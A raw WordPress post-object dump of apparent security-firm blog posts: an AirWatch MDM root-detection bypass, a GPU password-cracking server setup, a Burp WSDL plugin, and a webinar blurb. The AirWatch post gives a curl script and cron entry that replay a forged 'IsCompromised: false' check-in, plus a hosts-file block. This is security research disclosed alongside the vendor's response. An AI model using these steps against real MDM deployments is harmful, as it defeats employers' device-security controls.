1151 [post_author] => 7 [post_date] => 2013-08-15 07:00:07 [post_date_gmt] => 2013-08-15 07:00:07 [post_content] => Mobile devices are becoming more common in corporate environments. As a result, mobile device management (MDM) solutions have cropped up so that employers can remotely manage and wipe devices if necessary, along with setting certain requirements that employees must comply with, such as setting a passcode, encrypting the device, and not jailbreaking or rooting the device. It's certainly not a bad idea to enforce restrictions on devices that may contain sensitive information. However, bypassing some of the restrictions that an employer may put in place is not difficult. This is especially true if someone wants to keep their device rooted. There are many contenders in the sphere of MDM software; for this blog I will be looking at AirWatch for Android. The device I will be using is a rooted Nexus 4 running Android 4.2.2. [Note Update at End of Post - 09.13.13]

Background

AirWatch is an MDM solution that provides employers with the ability to manage mobile devices and enforce policies. An agent is installed on the device and monitors whether the device is compliant with specific policies. If a device is found to be non-compliant, the agent phones home to a server, notifying the employer of the non-compliant device. In the default web interface for an AirWatch enrolled device, my Nexus 4 shows as enrolled, encrypted, and requiring a passcode. However, it is still not compliant, because my device has been "compromised," i.e. rooted by myself; a poor word choice in my opinion. The same can be seen in the AirWatch agent. If we navigate to the compliance section, we can see why we are not compliant: again, the agent shows that we are encrypted, but our device is "compromised."

Digging Deeper

At this point I wanted to know how AirWatch was detecting that my phone is rooted. I tried removing the su binary and any superuser applications, but that didn't seem to work. As a rooted phone, we can certainly grab the apk of the agent and tear it apart, but that only revealed obfuscated Java classes that would take a while to decipher. Next, I tried running strace against the agent process to get an idea of the calls it makes, hoping something there would reveal what it does to detect root. Again, no answers that I could find. I decided to shelve looking for how AirWatch detects root for another day and instead focused on the HTTP requests and responses that the agent was sending and receiving. I started Burp and set up a proxy on my Nexus 4. There is a fair amount of traffic between the AirWatch agent and the server it talks to, but one request in particular caught my eye: the AirWatchBeacon check-in request (I have omitted some of the more sensitive information from it). As you can see, there is an "IsCompromised" field in the request that is set to true. So I changed that to false and sent the request off. After refreshing the web interface, my device is no longer compromised, and the agent shows the same. So now we know how the agent checks in with the server and reports whether or not your device is compromised; by changing a simple flag, we now control that. Furthermore, there doesn't seem to be any session information associated with the request: we can replay the same request hours, even days later, and the server will accept it. The only downside now is that the agent will periodically do a check-in request with the server and report that the device is compromised, and it's a hassle to send a non-compromised request every time we want to be compliant. The first step I took in resolving this issue was to look at the AirWatch configuration options in its SQLite database. Using the SQLite Editor app from the Android market, I opened up the AirWatch database with root access. Selecting the AirWatch database reveals a number of interesting tables; the profileGroupSetting table is where most of the AirWatch configurations are stored. There are a few rows that look interesting. The ones that contain "interval" in the name seem to set how often the AirWatch requests are sent. I tried changing the BeaconInterval to large values to see if it would take longer for the check-in requests to be sent; that didn't seem to work, and neither did setting the value to zero or a negative value. For the most part, setting the interval values did not seem to do anything in my testing. There is, however, another way to stop AirWatch from sending out requests: modifying the Android hosts file to block the host that the requests are being sent to. The Android hosts file is located in /system/etc/, and again, you have to be root to modify it. I modified the hosts file to redirect the requested host to my localhost. The requested host is going to be different for every company, so I won't be showing that. It's been well over a week, and my device has still not checked in and still shows that I'm compliant. The only downside to not checking in often is that your device will show as not being seen for some time, and your employer may have a policy in place to remove devices that AirWatch shows as inactive.
One way to mitigate this is to periodically send the check-in request yourself. Setting up a cron job that uses curl to send the check-in request works very well:
#!/bin/bash
 
curl -X POST -d @request https://host/DeviceServices/AirWatchBeacon.svc/checkin -H "Content-Type: application/json" -H "User-Agent: AirWatch Agent/4.0.401/Android/4.2.2" -H "Host: host"
Here is the JSON POST request data the curl command uses for -d @request:
{"payLoad":{"FriendlyName":"Android_sdNexus 4_353918050698915","Model":"Nexus 4","CustomerLocationGroupRef":"YourGroup","PhoneNumber":"1111111111","DeviceType":5,"C2dmToken":"APA91bHcoJnegJy23fPaa2Fg2miP0vJEuC9aVcAw9iuwKb8AQcnzr7OyiXShrJSGD_AajBPUwuSm4Y_gcuz3ibnnjfbfpkLnAnoF599IM2yZhTVaUq0XWLKFfNP11oYzIavq4OjTO5DH4y3XpkvWmQBD16qkFJEg1BFFuOA2y1SJo6aE2yILIIo","IsCompromised":"false","OsVersion":"4.2.2","SerialNumber":"1111111111","Name":"Google occam","MacAddress":"ff:ff:ff:ff:ff:ff","DeviceIdentifier":"1111111111111","AWVersion":"4.0.401","TransactionIdentifier":"a8098ea5-a54e-412f-a911-a58920a24dc7"}}
Finally, add the bash script to your crontab by running "crontab -e" and adding the following at the end of the file:
0 */2 * * * /root/command.sh
This will cause the script to run every two hours.
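Note that cron executes the script directly, so the script needs to be executable (assuming the /root/command.sh path used in the crontab entry above):
chmod +x /root/command.sh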

Conclusion

MDM solutions are great for employers to manage mobile devices, but they are not without their problems. Not only was I able to bypass compliance for having a rooted device, but I was also able to bypass the device encryption requirement via the profileGroupSetting table. Bypassing compliance restrictions for AirWatch turned out to be relatively trivial after a few hours, and I'm sure it is similar with many other MDM solutions.

Update - 09.13.13

Eric Gruber: AirWatch states that it has addressed this issue by recommending that clients enable a security configuration setting called "secure channel," which, according to AirWatch, protects against man-in-the-middle attacks by using mutual X.509 message-level certificate signing and encryption between the client and the server. For AirWatch hosted customers, this option is now enabled by default and cannot be disabled. [post_title] => Bypassing AirWatch Root Restriction [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bypassing-airwatch-root-restriction [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:48:05 [post_modified_gmt] => 2021-06-08 21:48:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1151 [menu_order] => 744 [post_type] => post [post_mime_type] => [comment_count] => 23 [filter] => raw ) [13] => WP_Post Object ( [ID] => 1164 [post_author] => 7 [post_date] => 2013-04-15 07:00:07 [post_date_gmt] => 2013-04-15 07:00:07 [post_content] => Last week, Karl Fosaaen described in his blog the various trials and tribulations we went through at a hardware level in building a dedicated GPU cracking server. This week, I will be doing a complete walkthrough of installing all the software that we use on our box: the operating system, video drivers, oclHashcat-plus, and John the Ripper. Because we have AMD video cards, the driver installation and John the Ripper compilation sections will be tailored for AMD; sorry, Nvidia users.

Installing the OS:

For an operating system, Linux or Windows are the obvious choices; for a headless server, Linux is the better fit. The only downside with Linux is that video card driver support, especially for AMD, lags somewhat behind its Windows counterpart. The good news is that both AMD and Nvidia have been improving their Linux driver support in recent years. Any Linux distribution will do, but for our server we opted for Ubuntu 12.10 64-bit server edition to keep the setup minimal. Much of the information for the next few sections is from the hashcat wiki. To start off, download the Ubuntu 12.10 server edition ISO from Ubuntu. We don't have a CD drive on our server, so we had to copy the ISO to a flash drive; YUMI and UNetbootin make this process painless on Windows and Linux, respectively. Otherwise, the ISO can be burned to a disc. Boot up the Ubuntu image, choose your language, and select Install Ubuntu Server.

[Screenshot: Ubuntu Server installation menu]

Navigate through the installation options and select your preferences; for most people, the defaults should be sufficient. Then create your user when the dialog comes up. When the installation reaches the "Partition Disks" section, either manually set up partitions (if you know what you're doing) or just use the "Guided – use entire disk" option. We chose not to use LVM on our box, but the option is up to you.

[Screenshot: Partition Disks dialog]

After you are done partitioning your hard drive, write the changes to disk. If you have an HTTP proxy, enter the information when the dialog appears; if not, just continue. Next, select whether you would like automatic updates enabled; we opted not to, but it's entirely up to you. When the software selection appears, select OpenSSH server by navigating to it with the arrow keys and pressing the spacebar.

[Screenshot: software selection with OpenSSH server checked]

None of the other packages are required. Press Enter to install the software. When the installation is finished, install GRUB to the master boot record and reboot. You should now be booted into your new Ubuntu server!

Setting Up Ubuntu:

Before we install the video drivers, we have to set up our Ubuntu server with X11, because the AMD drivers require X11 to interact with the video cards to obtain fan speeds and GPU temperatures, which are very important to monitor while cracking. To begin, SSH into your server and update Ubuntu with the following command:
sudo apt-get update && sudo apt-get upgrade
After Ubuntu has updated, we will need to install a minimal X11 environment that our user can automatically log in to when the server is rebooted. This ensures that the X server is always running, which in turn allows continuous cracking without any hiccups. To keep it simple, a lightweight window manager is recommended; Openbox, fluxbox, and blackbox are three simple options. You are by no means restricted to a window manager: if you want GNOME, Xfce, or KDE, those can be installed too. For this installation, we will install fluxbox with lightdm as the display manager. To install these, run the following command:
sudo apt-get install fluxbox lightdm-gtk-greeter x11-utils
This should install all the necessary packages for an X11 environment to run. Now that we have an X11 environment installed, we need to let applications from the console know which display we are using. To do this, we set the DISPLAY variable to our current display. The format for the DISPLAY variable is hostname:display. For a local instance, the hostname can be omitted. The default display is usually going to be 0. Run the command below to set your current display to 0.
export DISPLAY=:0
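To make the setting persist whenever your user logs in, add the export to your .bashrc; for example (a one-liner, assuming bash is your login shell):
echo 'export DISPLAY=:0' >> ~/.bashrc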
I have run into many issues because I did not have this set, so make sure your .bashrc exports the correct display. Now that our X11 environment is set up, we can install the AMD drivers.

Installing AMD Drivers:

To begin installing the AMD drivers, we need to install some prerequisites. First, install unzip with the following command:
sudo apt-get install unzip
Next, we need to install the dependencies for fglrx, which is the proprietary Linux driver for AMD in Ubuntu's repositories. The only difference between fglrx and AMD's Catalyst drivers is that the latter is newer; they both require the same dependencies. Run the following command to install the fglrx dependencies:
sudo apt-get build-dep fglrx
If the fglrx dependencies are not installed, the AMD driver installation will fail with this fglrx error:

[Screenshot: fglrx installation error]

Now we can grab the latest version of the AMD Catalyst drivers from the AMD Catalyst™ Proprietary Display Driver page. The latest version at this time is 13.1. It should also be noted that oclHashcat-plus requires a specific version of Catalyst, which at this point is 13.1, so we're good there. Fetch the AMD driver with wget and then unzip it:
wget https://www2.ati.com/drivers/linux/amd-driver-installer-catalyst-13.1-linux-x86.x86_64.zip
unzip amd-driver-installer-catalyst-13.1-linux-x86.x86_64.zip
There should now be a .run file in the directory. Execute the file while running as root.
sudo sh amd-driver-installer-catalyst-13.1-linux-x86.x86_64.run
Select the default options on all the dialog boxes and let the driver install. After it is done, create a new xorg.conf by running:
sudo amdconfig --adapter=all --initial -f
Then we are going to set up our user to automatically log in to fluxbox when the server boots up. Open the lightdm.conf file in /etc/lightdm/ as root and add the following lines:
[SeatDefaults]
greeter-session=lightdm-gtk-greeter
user-session=fluxbox
autologin-user=USER
autologin-user-timeout=0
Reboot the server and your user should be automatically logged into fluxbox. When the server boots up, run
amdconfig --list-adapters
and
amdconfig --adapter=all --odgt
to verify that all your cards and their temperatures can be seen.

[Screenshot: amdconfig listing the adapters and their temperatures]

Now that the AMD drivers are installed, we can install our cracking software.

Installing oclHashcat-plus

Download the latest oclHashcat-plus. We will just wget the latest version to our box.
wget https://hashcat.net/files/oclHashcat-plus-0.14.7z
oclHashcat-plus comes in 7z format, so we need to install p7zip to extract it.
sudo apt-get install p7zip
Run p7zip with the -d flag to extract a 7z file.
p7zip -d oclHashcat-plus-0.14.7z
Navigate to the newly extracted ocl directory and run one of the Example.sh scripts to do a test run of the cracking process.

[Screenshot: oclHashcat-plus example run]

If all goes well, you should see your cards loading up and the hash getting cracked! If you do not see all of your cards being recognized, make sure that your xorg.conf was created properly; try running the amdconfig command above again to regenerate it. Next, we will install John the Ripper with OpenCL support.

Installing John the Ripper

Like oclHashcat-plus, John also supports cracking hashes on GPUs, but it must be compiled with the options to do so. Much of the information here is taken from the John GPU wiki (https://openwall.info/wiki/john/GPU). First, download the Accelerated Parallel Processing (APP) SDK from AMD. 32-bit and 64-bit versions are supported, so make sure you download the correct one for your architecture. Copy the file to your server with scp or, if you're on Windows, WinSCP. Next, extract the APP SDK file.
tar xvf AMD-APP-SDK-v2.8-lnx64.tgz
Then run the Install-AMD-APP.sh as root.
sudo ./Install-AMD-APP.sh
Reboot the server. After the APP SDK has been installed, download the latest version of John. We will be using the jumbo version.
wget https://www.openwall.com/john/g/john-1.7.9-jumbo-7.tar.gz
Extract john with the following command:
tar xvf john-1.7.9-jumbo-7.tar.gz
Next, install the libssl-dev package from apt-get so that John compiles correctly.
sudo apt-get install libssl-dev
Navigate to the john src directory. Compile john with OpenCL support for either 32-bit or 64-bit with
make linux-x86-opencl
or
make linux-x86-64-opencl
respectively. John can also be compiled with CUDA support if you have Nvidia cards; the information on how to do that is located on their wiki. If you get an "openssl headers not found" error during compilation, install the libssl-dev package as above. Navigate back to the run directory and your newly compiled john binary should be there. You can test that John can use your GPUs by running a test command.
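For example, John's built-in benchmark exercises every format the binary was compiled with, including the OpenCL ones (run it from the run directory):
./john --test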

[Screenshot: John the Ripper GPU test output]

Conclusion

This guide details one of many possible setups for a GPU cracking server. When all is done, a cracking server built to these specifications works very well. In Karl's blog here, he describes common ways to obtain hashes to crack from Windows, Linux, and web applications. [post_title] => GPU Cracking: Setting up a Server [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-setting-up-a-server [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:50:18 [post_modified_gmt] => 2021-06-08 21:50:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1164 [menu_order] => 757 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [14] => WP_Post Object ( [ID] => 1172 [post_author] => 7 [post_date] => 2013-03-05 07:00:17 [post_date_gmt] => 2013-03-05 07:00:17 [post_content] => WSDL (Web Services Description Language) files are XML-formatted descriptions of the operations a web service exposes to clients. They contain the possible requests, along with the parameters an application uses to communicate with the web service. This is great for penetration testers, because we can test and manipulate web services all we want using the information from WSDL files. One of the best tools for working with HTTP requests and responses is Burp. The only downside with Burp is that it does not natively support parsing of WSDL files into requests that can be sent to a web service. A common workaround has been to use a tool such as Soap-UI and proxy the requests through Burp for further manipulation. I've written a plugin for Burp that takes a WSDL request, parses out the operations associated with the targeted web service, and creates SOAP requests which can then be sent to the web service. This plugin builds upon the work done by Tom Bujok and his soap-ws project, which is essentially the WSDL-parsing portion of Soap-UI without the UI. The Wsdler plugin, along with all of the source, is located at the GitHub repository here: https://github.com/NetSPI/Wsdler.

Wsdler Requirements

  1. Burp 1.5.01 or later
  2. Must be run from the command line

Starting Wsdler

The command to start Burp with the Wsdler plugin is as follows:

java -classpath Wsdler.jar;burp.jar burp.StartBurp
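
The semicolon classpath separator is Windows syntax; on Linux or OS X, use a colon instead:

java -classpath Wsdler.jar:burp.jar burp.StartBurp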

Sample Usage

Here we will intercept the request for a WSDL file belonging to an online store in Burp.

[Screenshot: the intercepted WSDL request in Burp]

After the request for the WSDL has been intercepted, right-click on the request and select Parse WSDL.

[Screenshot: the Parse WSDL context menu option]

A new Wsdler tab will open with the parsed operations for the WSDL, along with the bindings and ports for each of the operations. Operations are synonymous with the requests that the application supports; there are two operations in this WSDL file, OrderItem and CheckStatus. Each of these operations has two bindings. For simplicity's sake, bindings describe the format and protocol for each of the operations. The bindings for both operations are InstantOrderSoap and InstantOrderSoap12; the reason each operation has two bindings is that the WSDL file supports the creation of both SOAP 1.1 and SOAP 1.2 requests. Finally, the "Port" for each of the operations is essentially just the URL the request will be sent to. The full specification for each of the objects in WSDL files can be read here: https://www.w3.org/TR/wsdl.
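
For reference, a generated SOAP 1.1 request for the OrderItem operation looks roughly like the sketch below. The endpoint path, namespace, and parameter names here are hypothetical; the real ones are parsed out of the WSDL:

POST /instantorder.asmx HTTP/1.1
Host: www.example.com
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://example.com/OrderItem"

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:ord="http://example.com/">
  <soapenv:Header/>
  <soapenv:Body>
    <ord:OrderItem>
      <ord:ItemName>Arma virumque cano</ord:ItemName>
      <ord:Quantity>1</ord:Quantity>
    </ord:OrderItem>
  </soapenv:Body>
</soapenv:Envelope>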

[Screenshot: the parsed operations and generated SOAP requests in the Wsdler tab]

The SOAP requests for the operations will be in the lower part of the Burp window. The parsing functionality will also automatically fill in the data type for each of the parameters in the WSDL operation; in this example, strings are filled in with parts of the Aeneid and integers are filled in with numbers. The request that Wsdler creates is a standard Burp request, so it can be sent to any other Burp function that accepts requests (Intruder, Repeater, etc.). Here the request is sent to Intruder for further testing. Because the request is XML, Burp automatically identifies the parameters for Intruder to use.

[Screenshot: the generated request sent to Intruder]

[Screenshot: Intruder with the XML parameters identified]

Conclusion

Currently, the plugin only supports WSDL specification 1.1, but there is work on supporting 1.2 / 2.0. I will also be adding the option to specify your own strings and integers for the plugin to use when it automatically fills in the data type for each of the parameters in the parsed operations. If there are any bugs or features that you would like to see added, send me an email or create a ticket on GitHub. [post_title] => Hacking Web Services with Burp [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => hacking-web-services-with-burp [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:45:33 [post_modified_gmt] => 2021-06-08 21:45:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1172 [menu_order] => 766 [post_type] => post [post_mime_type] => [comment_count] => 38 [filter] => raw ) ) [post_count] => 15 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 27398 [post_author] => 53 [post_date] => 2022-02-21 12:52:03 [post_date_gmt] => 2022-02-21 18:52:03 [post_content] =>

Security leaders today are experiencing change at a rate like never before. Whether they’re going through an acquisition, deploying a remote workforce, or migrating workloads to the cloud, change is inevitable and unknown assets are sure to exist on your network.

Detecting and preventing the unknown is no easy task. But what you don’t know can hurt you. So, how can we identify vulnerable exposures before adversaries do?

It’s time for organizations to master the art of attack surface management. How? By implementing a human-first, continuous, risk-based approach.

In this webinar, participants will learn:

  • What is attack surface management?
  • How cyber attack surface management fits into broader enterprise-wide vulnerability management efforts
  • How to improve your attack surface visibility with continuous penetration testing
  • Why a human-first approach is the future of attack surface monitoring
  • An introduction to NetSPI’s Attack Surface Management (ASM) solution and our ASM Operations Team
[post_title] => Mastering the Art of Attack Surface Management [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => the-art-of-attack-surface-management [to_ping] => [pinged] => [post_modified] => 2023-09-20 11:12:35 [post_modified_gmt] => 2023-09-20 16:12:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=27398 [menu_order] => 47 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 15 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 3a9d9e7c7a39ac5fa8569b1408b00f2a [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )
